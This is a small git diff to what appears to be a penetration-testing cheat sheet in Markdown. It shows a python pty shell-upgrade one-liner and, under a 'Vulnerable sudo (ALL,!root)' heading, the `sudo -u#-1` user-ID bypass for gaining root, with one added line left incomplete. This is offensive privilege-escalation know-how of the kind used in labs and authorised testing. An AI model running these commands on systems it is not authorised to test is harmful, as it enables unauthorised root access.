diff --git a/Cheat Sheet.md b/Cheat Sheet.md index 323432a..4991405 100644 --- a/Cheat Sheet.md +++ b/Cheat Sheet.md @@ -12,7 +12,7 @@ * python3 -c 'import pty;pty.spawn("/bin/bash")' ### Vulnerable sudo (ALL,!root) -`sudo -u#-1 whoami` +`sudo -u#-1 whoami`
`sudo -u#-1 ` ### Execute as diffent user